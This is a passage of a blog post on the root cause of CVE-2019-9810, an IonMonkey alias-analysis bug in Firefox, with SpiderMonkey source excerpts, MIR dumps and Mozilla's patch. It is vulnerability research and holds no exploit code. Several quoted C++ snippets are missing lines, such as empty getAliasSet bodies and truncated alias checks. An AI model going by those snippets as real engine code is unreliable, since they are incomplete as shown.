relied on a Javascript library developed by @5aelo that allows code to manipulate 64-bit integers. Around the same time ZDI had released a PoC for CVE-2019-9810 which is an issue in IonMonkey (Mozilla's speculative JIT engine) that was discovered and used by the magicians Richard Zhu and Amat Cama during Pwn2Own2019 for compromising Mozilla's web-browser. This was the perfect occasion to write an exploit and add BigInt support in my utility script. You can find the actual exploit on my github in the following repository: CVE-2019-9810. Once I was done with it, I felt that it was also a great occasion to dive into Ion and get to know each other. The original exploit was written without understanding one bit of the root-cause of the issue and unwinding this sounded like a nice exercise. This is basically what this blogpost is about, me exploring Ion's code-base and investigating the root-cause of CVE-2019-9810. The title of the issue "IonMonkey MArraySlice has incorrect alias information" sounds to suggest that the root of the issue concerns some alias information and the fix of the issue also points at Ion's AliasAnalysis optimization pass. Before starting, if you guys want to follow the source-code at home without downloading the whole of Spidermonkey’s / Firefox’s source-code I have set-up the woboq code browser on an S3 bucket here: ff-woboq - just remember that the snapshot has the fix for the issue we are discussing. Last but not least, I've noticed that IonMonkey gets decent code-churn and as a result some of the functions I mention below can be appear with a slightly different name on the latest available version. All right, buckle up and enjoy the read! ## Speculative optimizing JIT compiler This part is not really meant to introduce what optimizing speculative JIT engines are in detail but instead giving you an idea of the problem they are trying to solve. On top of that, we want to introduce some background knowledge about Ion specifically that is required to be able to follow what is to come. For the people that never heard about JIT (just-in-time) engines, this is a piece of software that is able to turn code that is managed code into native code as it runs. This has been historically used by interpreted languages to produce faster code as running assembly is faster than a software CPU running code. With that in mind, this is what the Javascript bytecode looks like in Spidermonkey: js> function f(a, b) { return a+b; } js> dis(f) flags: CONSTRUCTOR loc op ----- -- main: 00000: getarg 0 # 00003: getarg 1 # 00006: add # 00007: return # 00008: retrval # !!! UNREACHABLE !!! Source notes: ofs line pc delta desc args ---- ---- ----- ------ -------- ------ 0: 1 0 [ 0] colspan 19 2: 1 0 [ 0] step-sep 3: 1 0 [ 0] breakpoint 4: 1 7 [ 7] colspan 12 6: 1 8 [ 1] breakpoint  Now, generating assembly is one thing but the JIT engine can be more advanced and apply a bunch of program analysis to optimize the code even more. Imagine a loop that sums every item in an array and does nothing else. Well, the JIT engine might be able to prove that it is safe to not do any bounds check on the index in which case it can remove it. Another easy example to reason about is an object getting constructed in a loop body but doesn't depend on the loop itself at all. If the JIT engine can prove that the statement is actually an invariant, then why constructing it for every run of the loop body? In that case it makes sense for the optimizer to move the statement out of the loop to avoid the useless constructions. This is the optimized assembly generated by Ion for the same function than above: 0:000> u . l20 000003add5d09231 cc int 3 000003add5d09232 8b442428 mov eax,dword ptr [rsp+28h] 000003add5d09236 8b4c2430 mov ecx,dword ptr [rsp+30h] 000003add5d0923a 03c1 add eax,ecx 000003add5d0923c 0f802f000000 jo 000003add5d09271 000003add5d09242 48b9000000000080f8ff mov rcx,0FFF8800000000000h 000003add5d0924c 480bc8 or rcx,rax 000003add5d0924f c3 ret 000003add5d09271 2bc1 sub eax,ecx 000003add5d09273 e900000000 jmp 000003add5d09278 000003add5d09278 6a0d push 0Dh 000003add5d0927a e900000000 jmp 000003add5d0927f 000003add5d0927f 6a00 push 0 000003add5d09281 e99a6effff jmp 000003add5d00120 <- bailout  OK so this was for optimizing and JIT compiler, but what about speculative now? If you think about this for a minute or two though, in order to pull off the optimizations we talked about above, you also need a lot of information about the code you are analyzing. For example, you need to know the types of the object you are dealing with, and this information is hard to get in dynamically typed languages because by-design the type of a variable changes across the program execution. Now, obviously the engine cannot randomly speculates about types, instead what they usually do is introspect the program at runtime and observe what is going on. If this function has been invoked many times and everytime it only received integers, then the engine makes an educated guess and speculates that the function receives integers. As a result, the engine is going to optimize that function under this assumption. On top of optimizing the function it is going to insert a bunch of code that is only meant to ensure that the parameters are integers and not something else (in which case the generated code is not valid). Adding two integers is not the same as adding two strings together for example. So if the engine encounters a case where the speculation it made doesn't hold anymore, it can toss the code it generated and fall-back to executing (called a deoptimization bailout) the code back in the interpreter, resulting in a performance hit. As you can imagine, the process of analyzing the program as well as running a full optimization pipeline and generating native code is very costly. So at times, even though the interpreter is slower, the cost of JITing might not be worth it over just executing something in the interpreter. On the other hand, if you executed a function let's say a thousand times, the cost of JITing is probably gonna be offset over time by the performance gain of the optimized native code. To deal with this, Ion uses what it calls warm-up counters to identify hot code from cold code (which you can tweak with --ion-warmup-threshold passed to the shell).  // Force how many invocation or loop iterations are needed before compiling // a function with the highest ionmonkey optimization level. // (i.e. OptimizationLevel_Normal) const char* forcedDefaultIonWarmUpThresholdEnv = "JIT_OPTION_forcedDefaultIonWarmUpThreshold"; if (const char* env = getenv(forcedDefaultIonWarmUpThresholdEnv)) { Maybe<int> value = ParseInt(env); if (value.isSome()) { forcedDefaultIonWarmUpThreshold.emplace(value.ref()); } else { Warn(forcedDefaultIonWarmUpThresholdEnv, env); } } // From the Javascript shell source-code int32_t warmUpThreshold = op.getIntOption("ion-warmup-threshold"); if (warmUpThreshold >= 0) { jit::JitOptions.setCompilerWarmUpThreshold(warmUpThreshold); }  On top of all of the above, Spidermonkey uses another type of JIT engine that produces less optimized code but produces it at a lower cost. As a result, the engine has multiple options depending on the use case: it can run in interpreted mode, it can perform cheaper-but-slower JITing, or it can perform expensive-but-fast JITing. Note that this article only focuses Ion which is the fastest/most expensive tier of JIT in Spidermonkey. Here is an overview of the whole pipeline (picture taken from Mozilla’s wiki): OK so in Spidermonkey the way it works is that the Javascript code is translated to an intermediate language that the interpreter executes. This bytecode enters Ion and Ion converts it to another representation which is the Middle-level Intermediate Representation (abbreviated MIR later) code. This is a pretty simple IR which uses Static Single Assignment and has about ~300 instructions. The MIR instructions are organized in basic-blocks and themselves form a control-flow graph. Ion's optimization pipeline is composed of 29 steps: certain steps actually modifies the MIR graph by removing or shuffling nodes and others don't modify it at all (they just analyze it and produce results consumed by later passes). To debug Ion, I recommend to add the below to your mozconfig file: ac_add_options --enable-jitspew  This basically turns on a bunch of macro in the Spidermonkey code-base that are used to spew debugging information on the standard output. The debugging infrastructure is not nearly as nice as Turbolizer but we will do with the tools we have. The JIT subsystem can define a number of channels where it can output spew and the user can turn on/off any of them. This is pretty useful if you want to debug a single optimization pass for example. // New channels may be added below. #define JITSPEW_CHANNEL_LIST(_) \ /* Information during sinking */ \ _(Prune) \ /* Information during escape analysis */ \ _(Escape) \ /* Information during alias analysis */ \ _(Alias) \ /* Information during alias analysis */ \ _(AliasSummaries) \ /* Information during GVN */ \ _(GVN) \ /* Information during sincos */ \ _(Sincos) \ /* Information during sinking */ \ _(Sink) \ /* Information during Range analysis */ \ _(Range) \ /* Information during LICM */ \ _(LICM) \ /* Info about fold linear constants */ \ _(FLAC) \ /* Effective address analysis info */ \ _(EAA) \ /* Information during regalloc */ \ _(RegAlloc) \ /* Information during inlining */ \ _(Inlining) \ /* Information during codegen */ \ _(Codegen) \ /* Debug info about safepoints */ \ _(Safepoints) \ /* Debug info about Pools*/ \ _(Pools) \ /* Profiling-related information */ \ _(Profiling) \ /* Information of tracked opt strats */ \ _(OptimizationTracking) \ _(OptimizationTrackingExtended) \ /* Debug info about the I */            \
_(CacheFlush)                            \
/* Output a list of MIR expressions */   \
_(MIRExpressions)                        \
/* Print control flow graph */           \
_(CFG)                                   \
\
/* BASELINE COMPILER SPEW */             \
\
/* Aborting Script Compilation. */       \
_(BaselineAbort)                         \
/* Script Compilation. */                \
_(BaselineScripts)                       \
/* Detailed op-specific spew. */         \
_(BaselineOp)                            \
/* Inline caches. */                     \
_(BaselineIC)                            \
/* Inline cache fallbacks. */            \
_(BaselineICFallback)                    \
/* OSR from Baseline => Ion. */          \
_(BaselineOSR)                           \
/* Bailouts. */                          \
_(BaselineBailouts)                      \
/* Debug Mode On Stack Recompile . */    \
_(BaselineDebugModeOSR)                  \
\
/* ION COMPILER SPEW */                  \
\
/* Used to abort SSA construction */     \
_(IonAbort)                              \
/* Information about compiled scripts */ \
_(IonScripts)                            \
/* Info about failing to log script */   \
_(IonSyncLogs)                           \
/* Information during MIR building */    \
_(IonMIR)                                \
/* Information during bailouts */        \
_(IonBailouts)                           \
/* Information during OSI */             \
_(IonInvalidate)                         \
/* Debug info about snapshots */         \
_(IonSnapshots)                          \
/* Generated inline cache stubs */       \
_(IonIC)
enum JitSpewChannel {
#define JITSPEW_CHANNEL(name) JitSpew_##name,
JITSPEW_CHANNEL_LIST(JITSPEW_CHANNEL)
#undef JITSPEW_CHANNEL
JitSpew_Terminator
};


In order to turn those channels you need to define an environment variable called IONFLAGS where you can specify a comma separated string with all the channels you want turned on: IONFLAGS=alias,alias-sum,gvn,bailouts,logs for example. Note that the actual channel names don’t quite match with the macros above and so you can find all the names below:

static void PrintHelpAndExit(int status = 0) {
fflush(nullptr);
printf(
"\n"
"usage: IONFLAGS=option,option,option,... where options can be:\n"
"\n"
"  aborts        Compilation abort messages\n"
"  scripts       Compiled scripts\n"
"  mir           MIR information\n"
"  prune         Prune unused branches\n"
"  escape        Escape analysis\n"
"  alias         Alias analysis\n"
"  alias-sum     Alias analysis: shows summaries for every block\n"
"  gvn           Global Value Numbering\n"
"  licm          Loop invariant code motion\n"
"  flac          Fold linear arithmetic constants\n"
"  sincos        Replace sin/cos by sincos\n"
"  sink          Sink transformation\n"
"  regalloc      Register allocation\n"
"  inline        Inlining\n"
"  snapshots     Snapshot information\n"
"  codegen       Native code generation\n"
"  bailouts      Bailouts\n"
"  caches        Inline caches\n"
"  osi           Invalidation\n"
"  safepoints    Safepoints\n"
"  pools         Literal Pools (ARM only for now)\n"
"  cacheflush    Instruction Cache flushes (ARM only for now)\n"
"  range         Range Analysis\n"
"  logs          JSON visualization logging\n"
"  logs-sync     Same as logs, but flushes between each pass (sync. "
"compiled functions only).\n"
"  profiling     Profiling-related information\n"
"  trackopts     Optimization tracking information gathered by the "
"Gecko profiler. "
"(Note: call enableGeckoProfiling() in your script to enable it).\n"
"  trackopts-ext Encoding information about optimization tracking\n"
"  dump-mir-expr Dump the MIR expressions\n"
"  cfg           Control flow graph generation\n"
"  all           Everything\n"
"\n"
"  bl-aborts     Baseline compiler abort messages\n"
"  bl-scripts    Baseline script-compilation\n"
"  bl-op         Baseline compiler detailed op-specific messages\n"
"  bl-ic         Baseline inline-cache messages\n"
"  bl-ic-fb      Baseline IC fallback stub messages\n"
"  bl-osr        Baseline IC OSR messages\n"
"  bl-bails      Baseline bailouts\n"
"  bl-dbg-osr    Baseline debug mode on stack recompile messages\n"
"  bl-all        All baseline spew\n"
"\n"
"\n");
exit(status);
}


An important channel is logs which tells the compiler to output a ion.json file (in /tmp on Linux) which packs a ton of information that it gathered throughout the pipeline and optimization process. This file is meant to be loaded by another tool to provide a visualization of the MIR graph throughout the passes. You can find the original iongraph.py but I personally use ghetto-iongraph.py to directly render the graphviz graph into SVG in the browser whereas iongraph assumes graphviz is installed and outputs a single PNG file per pass. You can also toggle through all the pass directly from the browser which I find more convenient than navigating through a bunch of PNG files:

You can invoke it like this:

python c:\work\codes\ghetto-iongraph.py --js-path c:\work\codes\mozilla-central\obj-ff64-asan-fuzzing\dist\bin\js.exe --script-path %1 --overwrite


Reading MIR code is not too bad, you just have to know a few things:

1. Every instruction is an object
2. Each instruction can have operands that can be the result of a previous instruction
10 | add unbox8:Int32 unbox9:Int32 [int32]

1. Every instruction is identified by an identifier, which is an integer starting from 0
2. There are no variable names; if you want to reference the result of a previous instruction it creates a name by taking the name of the instruction concatenated with its identifier like unbox8 and unbox9 above. Those two references two unbox instructions identified by their identifiers 8 and 9:
08 | unbox parameter1 to Int32 (infallible)
09 | unbox parameter2 to Int32 (infallible)


That is all I wanted to cover in this little IonMonkey introduction - I hope it helps you wander around in the source-code and start investigating stuff on your own.

If you would like more content on the subject of Javascript JIT compilers, here is a list of links worth reading (they talk about different Javascript engine but the concepts are usually the same):

• JavaScript Core powering Safari:

• Chakra powering Microsoft Edge: Architecture overview

Let's have a look at alias analysis now :)

### Diving into Alias Analysis

The purpose of this part is to understand more of the alias analysis pass which is the specific optimization pass that has been fixed by Mozilla. To understand it a bit more we will simply take small snippets of Javascript, observe the results in a debugger as well as following the source-code along. We will get back to the vulnerability a bit later when we understand more about what we are talking about :). A good way to follow this section along is to open a web-browser to this file/function: AliasAnalysis.cpp:analyze.

Let's start with simple.js defined as the below:

function x() {
const a = [1,2,3,4];
a.slice();
}

for(let Idx = 0; Idx < 10000; Idx++) {
x();
}


Once x is compiled, we end up with the below MIR code after the AliasAnalysis pass has run (pass#09) (I annotated and cut some irrelevant parts):

...
08 | constant object 2cb22428f100 (Array)
09 | newarray constant8:Object
------------------------------------------------------ a[0] = 1
10 | constant 0x1
11 | constant 0x0
12 | elements newarray9:Object
13 | storeelement elements12:Elements constant11:Int32 constant10:Int32
14 | setinitializedlength elements12:Elements constant11:Int32
------------------------------------------------------ a[1] = 2
15 | constant 0x2
16 | constant 0x1
17 | elements newarray9:Object
18 | storeelement elements17:Elements constant16:Int32 constant15:Int32
19 | setinitializedlength elements17:Elements constant16:Int32
------------------------------------------------------ a[2] = 3
20 | constant 0x3
21 | constant 0x2
22 | elements newarray9:Object
23 | storeelement elements22:Elements constant21:Int32 constant20:Int32
24 | setinitializedlength elements22:Elements constant21:Int32
------------------------------------------------------ a[3] = 4
25 | constant 0x4
26 | constant 0x3
27 | elements newarray9:Object
28 | storeelement elements27:Elements constant26:Int32 constant25:Int32
29 | setinitializedlength elements27:Elements constant26:Int32
------------------------------------------------------
...
32 | constant 0x0
33 | elements newarray9:Object
34 | arraylength elements33:Elements
35 | arrayslice newarray9:Object constant32:Int32 arraylength34:Int32


The alias analysis is able to output a summary on the alias-sum channel and this is what it prints out when ran against x:

[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  elements12 marked depending on start4
[AliasSummaries]  elements17 marked depending on setinitializedlength14
[AliasSummaries]  elements22 marked depending on setinitializedlength19
[AliasSummaries]  elements27 marked depending on setinitializedlength24
[AliasSummaries]  elements33 marked depending on setinitializedlength29
[AliasSummaries]  arraylength34 marked depending on setinitializedlength29


OK, so that's kind of a lot for now so let's start at the beginning. Ion uses what they call alias set. You can see an alias set as an equivalence sets (term also used in compiler literature). Everything belonging to the same equivalence set may alias. Ion performs this analysis to determine potential dependencies between load and store instructions; that’s all it cares about. Alias information is used later in the pipeline to carry optimization such as redundancy elimination for example - more on that later.

// [SMDOC] IonMonkey Alias Analysis
//
// This pass annotates every load instruction with the last store instruction
// on which it depends. The algorithm is optimistic in that it ignores explicit
// dependencies and only considers loads and stores.
//
// Loads inside loops only have an implicit dependency on a store before the
// loop header if no instruction inside the loop body aliases it. To calculate
// this efficiently, we maintain a list of maybe-invariant loads and the
// combined alias set for all stores inside the loop. When we see the loop's
// backedge, this information is used to mark every load we wrongly assumed to
// be loop invariant as having an implicit dependency on the last instruction of
// the loop header, so that it's never moved before the loop header.
//
// The algorithm depends on the invariant that both control instructions and
// effectful instructions (stores) are never hoisted.


In Ion, instructions are free to provide refinement to their alias set by overloading getAliasSet; here are the various alias sets defined for every different MIR opcode that we encountered in the MIR code of x:

// A constant js::Value.
class MConstant : public MNullaryInstruction {
AliasSet getAliasSet() const override { return AliasSet::None(); }
};

class MNewArray : public MUnaryInstruction, public NoTypePolicy::Data {
// NewArray is marked as non-effectful because all our allocations are
// either lazy when we are using "new Array(length)" or bounded by the
// script or the stack size when we are using "new Array(...)" or "[...]"
// notations.  So we might have to allocate the array twice if we bail
// during the computation of the first element of the square braket
// notation.
virtual AliasSet getAliasSet() const override { return AliasSet::None(); }
};

// Returns obj->elements.
class MElements : public MUnaryInstruction, public SingleObjectPolicy::Data {
AliasSet getAliasSet() const override {
}
};

// Store a value to a dense array slots vector.
class MStoreElement
: public MTernaryInstruction,
public MStoreElementCommon,
public MixPolicy<SingleObjectPolicy, NoFloatPolicy<2>>::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::Element);
}
};

// Store to the initialized length in an elements header. Note the input is an
// *index*, one less than the desired length.
class MSetInitializedLength : public MBinaryInstruction,
public NoTypePolicy::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::ObjectFields);
}
};

class MArrayLength : public MUnaryInstruction, public NoTypePolicy::Data {
AliasSet getAliasSet() const override {
}
};

// Array.prototype.slice on a dense array.
class MArraySlice : public MTernaryInstruction,
public MixPolicy<ObjectPolicy<0>, UnboxedInt32Policy<1>,
UnboxedInt32Policy<2>>::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::Element | AliasSet::ObjectFields);
}
};


The analyze function ignores instruction that are associated with no alias set as you can see below..:

    for (MInstructionIterator def(block->begin()),
end(block->begin(block->lastIns()));
def != end; ++def) {
def->setId(newId++);
AliasSet set = def->getAliasSet();
if (set.isNone()) {
continue;
}


..so let's simplify the MIR code by removing all the constant and newarray instructions to focus on what matters:

------------------------------------------------------ a[0] = 1
...
12 | elements newarray9:Object
13 | storeelement elements12:Elements constant11:Int32 constant10:Int32
14 | setinitializedlength elements12:Elements constant11:Int32
------------------------------------------------------ a[1] = 2
...
17 | elements newarray9:Object
18 | storeelement elements17:Elements constant16:Int32 constant15:Int32
19 | setinitializedlength elements17:Elements constant16:Int32
------------------------------------------------------ a[2] = 3
...
22 | elements newarray9:Object
23 | storeelement elements22:Elements constant21:Int32 constant20:Int32
24 | setinitializedlength elements22:Elements constant21:Int32
------------------------------------------------------ a[3] = 4
...
27 | elements newarray9:Object
28 | storeelement elements27:Elements constant26:Int32 constant25:Int32
29 | setinitializedlength elements27:Elements constant26:Int32
------------------------------------------------------
...
33 | elements newarray9:Object
34 | arraylength elements33:Elements
35 | arrayslice newarray9:Object constant32:Int32 arraylength34:Int32


In analyze, the stores vectors organize and keep track of every store instruction (any instruction that defines a Store() alias set) depending on their alias set; for example, if we run the analysis on the code above this is what the vectors would look like:

stores[AliasSet::Element]      = [13, 18, 23, 28, 35]
stores[AliasSet::ObjectFields] = [14, 19, 24, 29, 35]


This reads as instructions 13, 18, 23, 28 and 35 are store instruction in the AliasSet::Element alias set. Note that the instruction 35 not only alias AliasSet::Element but also AliasSet::ObjectFields.

Once the algorithm encounters a load instruction (any instruction that defines a Load() alias set), it wants to find the last store this load depends on, if any. To do so, it walks the stores vectors and evaluates the load instruction with the current store candidate (note that there is no need to walk the stores[AliasSet::Element vector if the load instruction does not even alias AliasSet::Element).

To establish a dependency link, obviously the two instructions don't only need to have alias set that intersects (Load(Any) intersects with Store(AliasSet::Element) for example). They also need to be operating on objects of the same type. This is what the function genericMightAlias tries to figure out: GetObject is used to grab the appropriate operands of the instruction (the one that references the object it is loading from / storing to), and objectsIntersect to do what its name suggests. The MayAlias analysis does two things:

1. Check if two instructions have intersecting alias sets
1. AliasSet::Load(AliasSet::Any) intersects with AliasSet::Store(AliasSet::Element)
2. Check if these instructions operate on intersecting TypeSets
1. GetObject is used to grab the appropriate operands off the instruction,
2. Then get its TypeSet,
3. And compute the intersection with objectsIntersect.
// Get the object of any load/store. Returns nullptr if not tied to
// an object.
static inline const MDefinition* GetObject(const MDefinition* ins) {
return nullptr;
}

// Note: only return the object if that object owns that property.
// I.e. the property isn't on the prototype chain.
const MDefinition* object = nullptr;
switch (ins->op()) {
case MDefinition::Opcode::InitializedLength:
// [...]
case MDefinition::Opcode::Elements:
object = ins->getOperand(0);
break;
}

object = MaybeUnwrap(object);
return object;
}

// Generic comparing if a load aliases a store using TI information.
MDefinition::AliasType AliasAnalysis::genericMightAlias(
const MDefinition* load, const MDefinition* store) {
const MDefinition* storeObject = GetObject(store);
return MDefinition::AliasType::MayAlias;
}

return MDefinition::AliasType::MayAlias;
}

storeObject->resultTypeSet())) {
return MDefinition::AliasType::MayAlias;
}

return MDefinition::AliasType::NoAlias;
}


Now, let's try to walk through this algorithm step-by-step for a little bit. We start in AliasAnalysis::analyze and assume that the algorithm has already run for some time against the above MIR code. It just grabbed the load instruction 17 | elements newarray9:Object (has an Load() alias set). At this point, the stores vectors are expected to look like this:

stores[AliasSet::Element]      = [13]
stores[AliasSet::ObjectFields] = [14]


The next step of the algorithm now is to figure out if the current load is depending on a prior store. If it does, a dependency link is created between the two; if it doesn't it carries on.

To achieve this, it iterates through the stores vectors and evaluates the current load against every available candidate store (aliasedStores in AliasAnalysis::analyze). Of course it doesn't go through every vector, but only the ones that intersects with the alias set of the load instruction (there is no point to carry on if we already know off the bat that they don't even intersect).

In our case, the 17 | elements newarray9:Object can only alias with a store coming from store[AliasSet::ObjectFields] and so 14 | setinitializedlength elements12:Elements constant11:Int32 is selected as the current store candidate.

The next step is to know if the load instruction can alias with the store instruction. This is carried out by the function AliasAnalysis::genericMightAlias which returns either MayAlias or NoAlias.

The first stage is to understand if the load and store nodes even have anything related to each other. Keep in mind that those nodes are instructions with operands and as a result you cannot really tell if they are working on the same objects without looking at their operands. To extract the actual relevant object, it calls into GetObject which is basically a big switch case that picks the right operand depending on the instruction. As an example, for 17 | elements newarray9:Object, GetObject selects the first operand which is newarray9:Object.

// Get the object of any load/store. Returns nullptr if not tied to
// an object.
static inline const MDefinition* GetObject(const MDefinition* ins) {
return nullptr;
}

// Note: only return the object if that object owns that property.
// I.e. the property isn't on the prototype chain.
const MDefinition* object = nullptr;
switch (ins->op()) {
// [...]
case MDefinition::Opcode::Elements:
object = ins->getOperand(0);
break;
}

object = MaybeUnwrap(object);
return object;
}


Once it has the operand, it goes through one last step to potentially unwrap the operand until finding the corresponding object.

// Unwrap any slot or element to its corresponding object.
static inline const MDefinition* MaybeUnwrap(const MDefinition* object) {
while (object->isSlots() || object->isElements() ||
object->isConvertElementsToDoubles()) {
MOZ_ASSERT(object->numOperands() == 1);
object = object->getOperand(0);
}
if (object->isTypedArrayElements()) {
return nullptr;
}
if (object->isTypedObjectElements()) {
return nullptr;
}
if (object->isConstantElements()) {
return nullptr;
}
return object;
}


In our case newarray9:Object doesn't need any unwrapping as this is neither an MSlots / MElements / MConvertElementsToDoubles node. For the store candidate though, 14 | setinitializedlength elements12:Elements constant11:Int32, GetObject returns its first argument elements12 which isn't the actual 'root' object. This is when MaybeUnwrap is useful and grabs for us the first operand of 12 | elements newarray9:Object, newarray9 which is the root object. Cool.

Anyways, once we have our two objects, loadObject and storeObject we need to figure out if they are related. To do that, Ion uses a structure called a js::TemporaryTypeSet. My understanding is that a TypeSet completely describe the values that a particular value might have.

/*
* [SMDOC] Type-Inference TypeSet
*
* Information about the set of types associated with an lvalue. There are
* three kinds of type sets:
*
* - StackTypeSet are associated with TypeScripts, for arguments and values
*   observed at property reads. These are implicitly frozen on compilation
*   and only have constraints added to them which can trigger invalidation of
*   TypeNewScript information.
*
* - HeapTypeSet are associated with the properties of ObjectGroups. These
*   may have constraints added to them to trigger invalidation of either
*   compiled code or TypeNewScript information.
*
* - TemporaryTypeSet are created during compilation and do not outlive
*   that compilation.
*
* The contents of a type set completely describe the values that a particular
* lvalue might have, except for the following cases:
*
* - If an object's prototype or class is dynamically mutated, its group will
*   change. Type sets containing the old group will not necessarily contain
*   the new group. When this occurs, the properties of the old and new group
*   will both be marked as unknown, which will prevent Ion from optimizing
*   based on the object's type information.
*
* - If an unboxed object is converted to a native object, its group will also
*   change and type sets containing the old group will not necessarily contain
*   the new group. Unlike the above case, this will not degrade property type
*   information, but Ion will no longer optimize unboxed objects with the old
*   group.
*/


As a reminder, in our case we have newarray9:Object as loadObject (extracted off 17 | elements newarray9:Object) and newarray9:Object (extracted off 14 | setinitializedlength elements12:Elements constant11:Int32 which is the store candidate). Their TypeSet intersects (they have the same one) and as a result this means genericMightAlias returns Alias::MayAlias.

If genericMightAlias returns MayAlias the caller AliasAnalysis::analyze invokes the method mightAlias on the def variable which is the load instruction. This method is a virtual method that can be overridden by instructions in which case they get a chance to specify a specific behavior there.

Otherwise, the basic implementation is provided by js::jit::MDefinition::mightAlias which basically re-checks that the alias sets do intersect (even though we already know that at this point):

  virtual AliasType mightAlias(const MDefinition* store) const {
// Return whether this load may depend on the specified store, given
// that the alias sets intersect. This may be refined to exclude
// possible aliasing in cases where alias set flags are too imprecise.
if (!(getAliasSet().flags() & store->getAliasSet().flags())) {
return AliasType::NoAlias;
}
MOZ_ASSERT(!isEffectful() && store->isEffectful());
return AliasType::MayAlias;
}


As a reminder, in our case, the load instruction has the alias set Load(AliasSet::ObjectFields), and the store instruction has the alias set Store(AliasSet::ObjectFields)) as you can see below.

// Returns obj->elements.
class MElements : public MUnaryInstruction, public SingleObjectPolicy::Data {
AliasSet getAliasSet() const override {
}
};

// Store to the initialized length in an elements header. Note the input is an
// *index*, one less than the desired length.
class MSetInitializedLength : public MBinaryInstruction,
public NoTypePolicy::Data {
AliasSet getAliasSet() const override {
return AliasSet::Store(AliasSet::ObjectFields);
}
};


We are nearly done but... the algorithm doesn't quite end just yet though. It keeps iterating through the store candidates as it is only interested in the most recent store (lastStore in AliasAnalysis::analyze) and not a store as you can see below.

// Find the most recent store on which this instruction depends.
MInstruction* lastStore = firstIns;
for (AliasSetIterator iter(set); iter; iter++) {
MInstructionVector& aliasedStores = stores[*iter];
for (int i = aliasedStores.length() - 1; i >= 0; i--) {
MInstruction* store = aliasedStores[i];
if (genericMightAlias(*def, store) !=
MDefinition::AliasType::NoAlias &&
def->mightAlias(store) != MDefinition::AliasType::NoAlias &&
BlockMightReach(store->block(), *block)) {
if (lastStore->id() < store->id()) {
lastStore = store;
}
break;
}
}
}
def->setDependency(lastStore);
IonSpewDependency(*def, lastStore, "depends", "");


In our simple example, this is the only candidate so we do have what we are looking for :). And so a dependency is born..!

Of course we can also ensure that this result is shown in Ion's spew (with both alias and alias-sum channels turned on):

Processing store setinitializedlength14 (flags 1)
Load elements17 depends on store setinitializedlength14 ()
...
[AliasSummaries] Dependency list for other passes:
[AliasSummaries]  elements17 marked depending on setinitializedlength14


Great :).

At this point, we have an OK understanding of what is going on and what type of information the algorithm is looking for. What is also interesting is that the pass actually doesn't transform the MIR graph at all, it just analyzes it. Here is a small recap on how the analysis pass works against our code:

It iterates over the instructions in the basic block and only cares about store and load instructions If the instruction is a store, it gets added to a vector to keep track of it If the instruction is a load, it evaluates it against every store in the vector If the load and the store MayAlias a dependency link is created between them mightAlias checks the intersection of both AliasSet genericMayAlias checks the intersection of both TypeSet If the engine can prove that there is NoAlias possible then this algorithm carries on

Even though the root-cause of the bug might be in there, we still need to have a look at what comes next in the optimization pipeline in order to understand how the results of this analysis are consumed. We can also expect that some of the following passes actually transform the graph which will introduce the exploitable behavior.

### Analysis of the patch

Now that we have a basic understanding of the Alias Analysis pass and some background information about how Ion works, it is time to get back to the problem we are trying to solve: what happens in CVE-2019-9810?

First things first: Mozilla fixed the issue by removing the alias set refinement done for the arrayslice instruction which will ensure creation of dependencies between arrayslice and loads instruction (which also means less opportunity for optimization):

# HG changeset patch
# User Jan de Mooij <[email protected]>
# Date 1553190741 0
# Node ID 229759a67f4f26ccde9f7bde5423cfd82b216fa2
# Parent  feda786b35cb748e16ef84b02c35fd12bd151db6
Bug 1537924 - Simplify some alias sets in Ion. r=tcampbell, a=dveditz

Differential Revision: https://phabricator.services.mozilla.com/D24400

diff --git a/js/src/jit/AliasAnalysis.cpp b/js/src/jit/AliasAnalysis.cpp
--- a/js/src/jit/AliasAnalysis.cpp
+++ b/js/src/jit/AliasAnalysis.cpp
@@ -128,17 +128,16 @@ static inline const MDefinition* GetObje
case MDefinition::Opcode::MaybeCopyElementsForWrite:
case MDefinition::Opcode::MaybeToDoubleElement:
case MDefinition::Opcode::TypedArrayLength:
case MDefinition::Opcode::TypedArrayByteOffset:
case MDefinition::Opcode::SetTypedObjectOffset:
case MDefinition::Opcode::SetDisjointTypedElements:
case MDefinition::Opcode::ArrayPopShift:
case MDefinition::Opcode::ArrayPush:
-    case MDefinition::Opcode::ArraySlice:
case MDefinition::Opcode::StoreTypedArrayElementHole:
case MDefinition::Opcode::StoreFixedSlot:
case MDefinition::Opcode::GetPropertyPolymorphic:
case MDefinition::Opcode::SetPropertyPolymorphic:
case MDefinition::Opcode::GuardShape:
@@ -153,16 +152,17 @@ static inline const MDefinition* GetObje
case MDefinition::Opcode::TypedArrayElements:
case MDefinition::Opcode::TypedObjectElements:
case MDefinition::Opcode::CopyLexicalEnvironmentObject:
case MDefinition::Opcode::IsPackedArray:
object = ins->getOperand(0);
break;
case MDefinition::Opcode::GetPropertyCache:
+    case MDefinition::Opcode::CallGetProperty:
case MDefinition::Opcode::GetDOMProperty:
case MDefinition::Opcode::GetDOMMember:
case MDefinition::Opcode::Call:
case MDefinition::Opcode::Compare:
case MDefinition::Opcode::GetArgumentsObjectArg:
case MDefinition::Opcode::SetArgumentsObjectArg:
case MDefinition::Opcode::GetFrameArgument:
case MDefinition::Opcode::SetFrameArgument:
@@ -179,16 +179,17 @@ static inline const MDefinition* GetObje
case MDefinition::Opcode::WasmAtomicExchangeHeap:
case MDefinition::Opcode::WasmStoreGlobalVar:
case MDefinition::Opcode::WasmStoreGlobalCell:
case MDefinition::Opcode::WasmStoreRef:
case MDefinition::Opcode::ArrayJoin:
+    case MDefinition::Opcode::ArraySlice:
return nullptr;
default:
#ifdef DEBUG
// Crash when the default aliasSet is overriden, but when not added in the
// list above.
if (!ins->getAliasSet().isStore() ||
ins->getAliasSet().flags() != AliasSet::Flag::Any) {
MOZ_CRASH(
diff --git a/js/src/jit/MIR.h b/js/src/jit/MIR.h
--- a/js/src/jit/MIR.h
+++ b/js/src/jit/MIR.h
@@ -8077,19 +8077,16 @@ class MArraySlice : public MTernaryInstr
TRIVIAL_NEW_WRAPPERS
NAMED_OPERANDS((0, object), (1, begin), (2, end))

JSObject* templateObj() const { return templateObj_; }

gc::InitialHeap initialHeap() const { return initialHeap_; }

-  AliasSet getAliasSet() const override {
-    return AliasSet::Store(AliasSet::Element | AliasSet::ObjectFields);
-  }
bool possiblyCalls() const override { return true; }
